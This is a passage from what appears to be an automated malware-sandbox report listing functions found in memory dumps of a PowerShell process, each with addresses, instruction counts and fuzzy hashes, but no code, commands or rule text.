                                                                            Memory Dump Source
                                                                            • Source File: 0000000D.00000002.2956215880.0000000004B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B50000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_13_2_4b50000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 70f225cc0f2eea5a167377d2835b34948b5efc87f69cd3711d4f9385c3ef4ea3
                                                                            • Instruction ID: 1a6b6a45723207a366da7a83b8beae1a6ee4f070ed92c6bf9ef0f33ff3755262
                                                                            • Opcode Fuzzy Hash: 70f225cc0f2eea5a167377d2835b34948b5efc87f69cd3711d4f9385c3ef4ea3
                                                                            • Instruction Fuzzy Hash: E9B16E70E00209DFDB10CFA8D9957ADFBF1EF48314F148569E855E7264EB74A886CB82
                                                                            Function 07826088 Relevance: .3, Instructions: 257COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 0000000D.00000002.3001293594.0000000007820000.00000040.00000800.00020000.00000000.sdmp, Offset: 07820000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_13_2_7820000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 2db557e6314233a28daac308d3760d6987631a39fa975bc2eee062fb727be672
                                                                            • Instruction ID: 09e0c24aa346cac9631af06a7e71463a3795522ac186d6421e603dd41186bf52
                                                                            • Opcode Fuzzy Hash: 2db557e6314233a28daac308d3760d6987631a39fa975bc2eee062fb727be672
                                                                            • Instruction Fuzzy Hash: 45A1AFB0B00214DFC704CF54C954B9ABBF2BB99305F14806AE905EB7A5DB71EC86DB91
                                                                            Function 0782609E Relevance: .2, Instructions: 244COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 0000000D.00000002.3001293594.0000000007820000.00000040.00000800.00020000.00000000.sdmp, Offset: 07820000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_13_2_7820000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 283312803a34a51ba632942a93b0604ad6c319399572802ab3215f6a29e0e03e
                                                                            • Instruction ID: f9b842e895811233b8e581032a1ca6eb28a909654a50a22a9f24ff2f5947d1f3
                                                                            • Opcode Fuzzy Hash: 283312803a34a51ba632942a93b0604ad6c319399572802ab3215f6a29e0e03e
                                                                            • Instruction Fuzzy Hash: 61A1BEB0B00215DFD714CF58C544B9EBBE2BBA8305F108069E905AB795DB71EC86DB91
                                                                            Function 091C4C70 Relevance: .2, Instructions: 217COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 0000000D.00000002.3009367324.00000000091C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 091C0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_13_2_91c0000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: a056a03c3073f1f182cfc9d1e4a850ced8e286ad37d2963ad5ed312a5125bdf2
                                                                            • Instruction ID: 9c056d7e625a0ab9b874ec63fe8d1f2562e02392ad7e7ada23c9301b5db181bc
                                                                            • Opcode Fuzzy Hash: a056a03c3073f1f182cfc9d1e4a850ced8e286ad37d2963ad5ed312a5125bdf2
                                                                            • Instruction Fuzzy Hash: BA81A274B002198FCB05DFA9D950AAEB7F6FF88304F148469D4059B3A5DB35EC46CB91
                                                                            Function 09283001 Relevance: .2, Instructions: 213COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 0000000D.00000002.3009982520.0000000009280000.00000040.00000800.00020000.00000000.sdmp, Offset: 09280000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_13_2_9280000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 572b5a1cf2d7222cf1055961790462cc08aa36f2a777d5b2a158f53e5a87609c
                                                                            • Instruction ID: 12d8c749f6ad7f5b06ceb3e16ee9ecea3d791bb2f9ff7d93888b852edbeb59eb
                                                                            • Opcode Fuzzy Hash: 572b5a1cf2d7222cf1055961790462cc08aa36f2a777d5b2a158f53e5a87609c
                                                                            • Instruction Fuzzy Hash: 92916D74A12205DFCB14DF58C581E9ABBF2BF89714F158099E804AB3A9C732EC81CF91
                                                                            Function 04B59B50 Relevance: .2, Instructions: 213COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 0000000D.00000002.2956215880.0000000004B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B50000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_13_2_4b50000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 66bd0dabbeed1082e0d3e9328855c6dc6f78cefe7c23a93f55aa581da193bff5
                                                                            • Instruction ID: e1dbd6319bcae96105005580e5881437353b5fd2f1866e7d27e4ce67c543b677
                                                                            • Opcode Fuzzy Hash: 66bd0dabbeed1082e0d3e9328855c6dc6f78cefe7c23a93f55aa581da193bff5
                                                                            • Instruction Fuzzy Hash: 05819B70A00208CFCB14DF68D984A9EFBF6FF85304F248569E8169B765DB75AC46CB80
                                                                            Function 04B582A8 Relevance: .2, Instructions: 210COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 0000000D.00000002.2956215880.0000000004B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B50000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_13_2_4b50000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 6a5276fed8024fb2787ccc3c53752dd6213b4782f1074ba29434a643a9944b68
                                                                            • Instruction ID: 18e361e766c599dae8dff17e6ed72c74cc5e962012316b5825903ad57befac20
                                                                            • Opcode Fuzzy Hash: 6a5276fed8024fb2787ccc3c53752dd6213b4782f1074ba29434a643a9944b68
                                                                            • Instruction Fuzzy Hash: 76819034A052449FCB15DFB8D584AAEFBF2FF49310B1484A9E845AB362DB35EC85CB50
                                                                            Function 09283020 Relevance: .2, Instructions: 201COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 0000000D.00000002.3009982520.0000000009280000.00000040.00000800.00020000.00000000.sdmp, Offset: 09280000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_13_2_9280000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 2bcd0ec80113f1bb3210034c570a008069eb95fd0192822d97e75278034f5002
                                                                            • Instruction ID: 9ca675845255c7dd652922e26d65e13f28e4b0df70e7b657840b133d5ef97452
                                                                            • Opcode Fuzzy Hash: 2bcd0ec80113f1bb3210034c570a008069eb95fd0192822d97e75278034f5002
                                                                            • Instruction Fuzzy Hash: CF812D74A11205DFDB14DF58C681E9ABBF2BF88714F14C099E905AB399C772EC81CB91
                                                                            Function 091C50C8 Relevance: .1, Instructions: 130COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 0000000D.00000002.3009367324.00000000091C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 091C0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_13_2_91c0000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 0482d20780fef19c31b85788c5571a9e9318af201f73434db27ababca305f3e9
                                                                            • Instruction ID: 10805b782b232ce272f13a417547a67e55a7988f810f036ef75290ffb73a5974
                                                                            • Opcode Fuzzy Hash: 0482d20780fef19c31b85788c5571a9e9318af201f73434db27ababca305f3e9
                                                                            • Instruction Fuzzy Hash: 305129B0E011099FCB05CF98C894AAEB7F2FF98314B258258E815EB3A5D735AC41CF90
                                                                            Function 0782A51C Relevance: .1, Instructions: 125COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 0000000D.00000002.3001293594.0000000007820000.00000040.00000800.00020000.00000000.sdmp, Offset: 07820000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_13_2_7820000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 84adebd405d5b8c38ada95570d0a41ab05bf886be80feecc82951b7b79acb5be
                                                                            • Instruction ID: 15bc2293d08a7d291ce846cc076a0f0de0b5068850ee7ed22589aa83f8d699bb
                                                                            • Opcode Fuzzy Hash: 84adebd405d5b8c38ada95570d0a41ab05bf886be80feecc82951b7b79acb5be
                                                                            • Instruction Fuzzy Hash: 8941F2F0A002269FCB199F688A4176A7BF2AFA1215F14C0A5CD04DF252D739D8C3D7A7
                                                                            Function 04B598E1 Relevance: .1, Instructions: 120COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 0000000D.00000002.2956215880.0000000004B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B50000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_13_2_4b50000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 25edc1d7be11c0b35225b27aa1fa5a54f495e8f1f1ceec50431ae3b3d2bade5a
                                                                            • Instruction ID: c8f626d3a69cd27eaa72ad0e5cb3ae20c8d6a72eb2441e0caf4664df52200d19
                                                                            • Opcode Fuzzy Hash: 25edc1d7be11c0b35225b27aa1fa5a54f495e8f1f1ceec50431ae3b3d2bade5a
                                                                            • Instruction Fuzzy Hash: 92416B35A05600CFDB14DB64C958AAEBBF2EF89354F1544ACE806EB7A0DB34AC81CB50
                                                                            Function 04B59B3B Relevance: .1, Instructions: 119COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 0000000D.00000002.2956215880.0000000004B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B50000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_13_2_4b50000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 9ef57720b8f83f5cf2b19f6dd35bd14dd5e280c41429dcf38bee58f88c0d51fa
                                                                            • Instruction ID: 50afcd5f342bd77b851a193697c5517de988c6df77b76aeccbd22e5714948369
                                                                            • Opcode Fuzzy Hash: 9ef57720b8f83f5cf2b19f6dd35bd14dd5e280c41429dcf38bee58f88c0d51fa
                                                                            • Instruction Fuzzy Hash: 4B415BB0A00608DFDB14DFA5C88479EFBF2FF85304F148469D416AB7A4DB75A885CB50
                                                                            Function 091C50B7 Relevance: .1, Instructions: 114COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 0000000D.00000002.3009367324.00000000091C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 091C0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_13_2_91c0000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 7b62a011f1965b2a9bbc7c7e8de3e3533b43016324640eb10f68d6bbd9a3c4dd
                                                                            • Instruction ID: 16956b488079cb11320ba675e36ab66d338c39ef44cb4a4b14aac396213d7e77
                                                                            • Opcode Fuzzy Hash: 7b62a011f1965b2a9bbc7c7e8de3e3533b43016324640eb10f68d6bbd9a3c4dd
                                                                            • Instruction Fuzzy Hash: DD41E5B4E011099FCB15CF98C9949AEB7F2FF88314B248258E825EB3A4D335AC51CF90
                                                                            Function 04B52C59 Relevance: .1, Instructions: 111COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 0000000D.00000002.2956215880.0000000004B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B50000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_13_2_4b50000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: c83031cdc8fa1db5d8ccf9fc1ddd9050a5c4b809d608bb3c538ab204ce3f2d8b
                                                                            • Instruction ID: 4f4ade9fcf7ae04078990906453380ec1bb71653707bf2cd6f8903ec2fad1e92
                                                                            • Opcode Fuzzy Hash: c83031cdc8fa1db5d8ccf9fc1ddd9050a5c4b809d608bb3c538ab204ce3f2d8b
                                                                            • Instruction Fuzzy Hash: B24137B4A016059FCB09CF59C594AAEFBB1FF88310B118599D805AB3A5C736FC50CFA0
                                                                            Function 078280F6 Relevance: .1, Instructions: 102COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 0000000D.00000002.3001293594.0000000007820000.00000040.00000800.00020000.00000000.sdmp, Offset: 07820000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_13_2_7820000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 9f032dccd47f944340547cff3ee31913ae5240f7a2ccf367615756ebfc4e8dc0
                                                                            • Instruction ID: eb649275b39d39ecf1f8528df431bc722578dc0ab8b1cd53a22cd163bb95c1d4
                                                                            • Opcode Fuzzy Hash: 9f032dccd47f944340547cff3ee31913ae5240f7a2ccf367615756ebfc4e8dc0
                                                                            • Instruction Fuzzy Hash: 4631B5B4B40214ABD7049B68C951F6E7BA3ABD4304F108424EA05AF3A5CF759C868BE1
                                                                            Function 07820A78 Relevance: .1, Instructions: 94COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 0000000D.00000002.3001293594.0000000007820000.00000040.00000800.00020000.00000000.sdmp, Offset: 07820000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_13_2_7820000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 10f5637a02a4521b7cb92315e4ff3a49f6861554d92fa4a843ae03d37b94cc3d
                                                                            • Instruction ID: 8373dc03a956b3139a9d375aa73d905618854e2c8058a8fe698a68acf98eb8e0
                                                                            • Opcode Fuzzy Hash: 10f5637a02a4521b7cb92315e4ff3a49f6861554d92fa4a843ae03d37b94cc3d
                                                                            • Instruction Fuzzy Hash: AB2181B130032A6BC7745DBAC800737B6D6ABE470AF248839A50ACF380CD35D8C29361
                                                                            Function 07820A5C Relevance: .1, Instructions: 87COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 0000000D.00000002.3001293594.0000000007820000.00000040.00000800.00020000.00000000.sdmp, Offset: 07820000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_13_2_7820000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: e9cfd9cd66ec696b326fe955703ccef8ff488e8f7f2ba1c7561bde84eec78751
                                                                            • Instruction ID: 5d6924d302d9b452e15b8353b0107f92987d5568e9ca75b737b98636a04a9cf7
                                                                            • Opcode Fuzzy Hash: e9cfd9cd66ec696b326fe955703ccef8ff488e8f7f2ba1c7561bde84eec78751
                                                                            • Instruction Fuzzy Hash: B421F1F13043666BC7640E7A88047727BE16FB1706F28842AD849CF2D1C53499C6D361
                                                                            Function 04B5390B Relevance: .1, Instructions: 85COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 0000000D.00000002.2956215880.0000000004B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B50000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_13_2_4b50000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 5d945b2f99f22cf304f24276b581eba158d68215febe85fa0245cf0c93c40800
                                                                            • Instruction ID: 485e2e2d872898f6cac5734c81124f40505c47083885d36326134d763c6cbf23
                                                                            • Opcode Fuzzy Hash: 5d945b2f99f22cf304f24276b581eba158d68215febe85fa0245cf0c93c40800
                                                                            • Instruction Fuzzy Hash: 843191B0A042459FCB05CF98C890AAAFFF1FF49310B15419AD949EB362C735EC41CBA1
                                                                            Function 091C0592 Relevance: .1, Instructions: 78COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 0000000D.00000002.3009367324.00000000091C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 091C0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_13_2_91c0000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 180fb4a2dd7942a8a266dcd72735ad13684ffa644c314b9121e0a691681e791c
                                                                            • Instruction ID: c17638b35536867e220fb62eb59a49675e03070b860bf0e901e0a44eeec70319
                                                                            • Opcode Fuzzy Hash: 180fb4a2dd7942a8a266dcd72735ad13684ffa644c314b9121e0a691681e791c
                                                                            • Instruction Fuzzy Hash: 343106B5A00605DFCB14CF99C5949AEFBF2FF88314B258699E419AB365C731EC81CB90
                                                                            Function 04B53989 Relevance: .1, Instructions: 76COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 0000000D.00000002.2956215880.0000000004B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B50000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_13_2_4b50000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: c2953f2bb35428d2a413905fd6c445f7315086e125a6f2740a1abceb34734099
                                                                            • Instruction ID: 43420623cd9f59edf512e00547240f306ee88e702cc1309b52ceb713e4d45bad
                                                                            • Opcode Fuzzy Hash: c2953f2bb35428d2a413905fd6c445f7315086e125a6f2740a1abceb34734099
                                                                            • Instruction Fuzzy Hash: 42315E74A042459FCB05CF98C480AAAFBF1FF49310B154599D849EB362C335EC41CBA1
                                                                            Function 04B5319D Relevance: .1, Instructions: 73COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 0000000D.00000002.2956215880.0000000004B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B50000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_13_2_4b50000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: e5174867cdc6569f6ff0220abd0608cbecdcba3d68cf670ce99570b05af6f643
                                                                            • Instruction ID: 2f6824ffe19a0a01ca9607c9ab2dff59b77fb2d87b241ad99a90bcb4acf3ee8d
                                                                            • Opcode Fuzzy Hash: e5174867cdc6569f6ff0220abd0608cbecdcba3d68cf670ce99570b05af6f643
                                                                            • Instruction Fuzzy Hash: 89214F74A056458FCB01CFA8D590A9EFBB1FF4A310B15459AD859EB362C235FC05CBA1
                                                                            Function 07820868 Relevance: .1, Instructions: 52COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 0000000D.00000002.3001293594.0000000007820000.00000040.00000800.00020000.00000000.sdmp, Offset: 07820000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_13_2_7820000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 056075d477298aa77435f6a0a62f978806a165ec9446254cb9d7e3bed441ada5
                                                                            • Instruction ID: 611bf387d38e043b53435ffb6d7cb1b576d54f4442032e394b4fd59f38f2be9b
                                                                            • Opcode Fuzzy Hash: 056075d477298aa77435f6a0a62f978806a165ec9446254cb9d7e3bed441ada5
                                                                            • Instruction Fuzzy Hash: 3301D87630022A9BD7246999D800667B795DBD1227F14843AD545C6640DA32C486A7A0
                                                                            Function 04B5F2D3 Relevance: .0, Instructions: 49COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 0000000D.00000002.2956215880.0000000004B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B50000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_13_2_4b50000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 9aa9e7dedfca2f3269323c51cd2edd1a2b19e37d885f7ad6786bf1adb3f40f3d
                                                                            • Instruction ID: cbcf4a46d0631ab22e9d4b77cd5e0392da2a509ce8e50dc601ccf59b1905262f
                                                                            • Opcode Fuzzy Hash: 9aa9e7dedfca2f3269323c51cd2edd1a2b19e37d885f7ad6786bf1adb3f40f3d
                                                                            • Instruction Fuzzy Hash: FF11C530D04148DFFF24EA94E5987FCF7B2EB4531DF2414AAD841B61A0EB74688ACB16
                                                                            Function 0310D01D Relevance: .0, Instructions: 45COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 0000000D.00000002.2953751249.000000000310D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0310D000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_13_2_310d000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 0af0c34b1c68dc4effa15d2d890b83301995114617deb2a7cb1dd167bd36122f
                                                                            • Instruction ID: 53620ef74000d7e29238f32eab76003ef1e18a6665e33e228607026f639323ce
                                                                            • Opcode Fuzzy Hash: 0af0c34b1c68dc4effa15d2d890b83301995114617deb2a7cb1dd167bd36122f
                                                                            • Instruction Fuzzy Hash: C301F7714093009BE714CA65DA84767FF9CEF49324F1CC469EC4C0B2CAC7B99881C6B1
                                                                            Function 091C4BD9 Relevance: .0, Instructions: 44COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 0000000D.00000002.3009367324.00000000091C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 091C0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_13_2_91c0000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 845c96946cc170aee33a63da2497d4d58b4d0d16ad880a3c20ffe416b626f938
                                                                            • Instruction ID: b43272d855d3d5baceb08abd924aea6211027f5f506db96881525f160b175458
                                                                            • Opcode Fuzzy Hash: 845c96946cc170aee33a63da2497d4d58b4d0d16ad880a3c20ffe416b626f938
                                                                            • Instruction Fuzzy Hash: AD01B1702083009FC329EF68D0A446AB7F2FF85345304482DD09ACB6B1CB75E846DF95
                                                                            Function 091C4970 Relevance: .0, Instructions: 42COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 0000000D.00000002.3009367324.00000000091C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 091C0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_13_2_91c0000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: cdd39e01095e97b07fc186bafda3f532153b059022d3fc5cf9622bfbd08ca45a
                                                                            • Instruction ID: dc90acb9db3c0e38f3c600a276a0875e66725bdc4c03e7644071f6fa7602de9f
                                                                            • Opcode Fuzzy Hash: cdd39e01095e97b07fc186bafda3f532153b059022d3fc5cf9622bfbd08ca45a
                                                                            • Instruction Fuzzy Hash: 98014C70B48249DBDB14DFE0D8A5BADBFB1EF58348F24042CE506AA2A5CB719885DF41
                                                                            Function 091C484F Relevance: .0, Instructions: 41COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 0000000D.00000002.3009367324.00000000091C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 091C0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_13_2_91c0000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 0c97a104d9c7fe8644c43dcb305ff7ca87a90f06755a456f14bb9924bae5b5ba
                                                                            • Instruction ID: dd29c7305fb37ae15cb7a42d23bd0dfce7038c1d3a71c34c950a1818d93346f5
                                                                            • Opcode Fuzzy Hash: 0c97a104d9c7fe8644c43dcb305ff7ca87a90f06755a456f14bb9924bae5b5ba
                                                                            • Instruction Fuzzy Hash: CF015A70F08249DBDB14EBE0D866BADBBB6FF54388F14442CE502AA2A4CB719945DB11
                                                                            Function 0310D01C Relevance: .0, Instructions: 36COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 0000000D.00000002.2953751249.000000000310D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0310D000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_13_2_310d000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: ad2612f28312ac85f23dc5923b56d404da42a8294b416f61a4500d4b582f0b1e
                                                                            • Instruction ID: 942979d5fd7122a71f0a975355544d954edb09258785e42cbc0b07efa658b75a
                                                                            • Opcode Fuzzy Hash: ad2612f28312ac85f23dc5923b56d404da42a8294b416f61a4500d4b582f0b1e
                                                                            • Instruction Fuzzy Hash: F8F0C271405344AEE7108A16D984B62FFA8EB45234F18C45AED8C0F286C3B99845CAB0
                                                                            Function 091C4ACB Relevance: .0, Instructions: 35COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 0000000D.00000002.3009367324.00000000091C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 091C0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_13_2_91c0000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: f71448d202ca9258f777b2fbfbd0a3022f00d207b4aa321f687749eae0406ca1
                                                                            • Instruction ID: 72de635886ff40a7f5307fdd6c4af7fa5e792608c096c08eb3cae7f4a92203a2
                                                                            • Opcode Fuzzy Hash: f71448d202ca9258f777b2fbfbd0a3022f00d207b4aa321f687749eae0406ca1
                                                                            • Instruction Fuzzy Hash: 3CF0A9B4B09209DBDB189BF0D9A6F6E3B75EB6430CF20041CE002AB2E5CF759944CB52
                                                                            Function 091C48F8 Relevance: .0, Instructions: 33COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 0000000D.00000002.3009367324.00000000091C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 091C0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_13_2_91c0000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: f89cd6c2466719a4354ecb3dfc07ccfaf25b5acbf6f8191aed5ebe7d9175fd14
                                                                            • Instruction ID: 1ca4c99aa0171313de9bde1a74f9bc5e072d2f33002165f103e4ad15702f0cfb
                                                                            • Opcode Fuzzy Hash: f89cd6c2466719a4354ecb3dfc07ccfaf25b5acbf6f8191aed5ebe7d9175fd14
                                                                            • Instruction Fuzzy Hash: 9BF06970A04049DBCB10DFE0D9A9BAE7FB1EB48344F240128E406AB295CB305D49DF51
                                                                            Function 091C49D0 Relevance: .0, Instructions: 32COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 0000000D.00000002.3009367324.00000000091C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 091C0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_13_2_91c0000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 3560c8980659ad3bd20772784cdd138d6214e855c3851af5be88597b4665a784
                                                                            • Instruction ID: 54551f15d8ace063b2fb2985401fbf0a0db1f8394476e3416c19804af27d1e28
                                                                            • Opcode Fuzzy Hash: 3560c8980659ad3bd20772784cdd138d6214e855c3851af5be88597b4665a784
                                                                            • Instruction Fuzzy Hash: EAF08770E04148DBCB10DFE0E8A9BAEBFB0EF48308F20002CE412AB2A5CB704885DF41
                                                                            Function 091C4C61 Relevance: .0, Instructions: 32COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 0000000D.00000002.3009367324.00000000091C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 091C0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_13_2_91c0000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
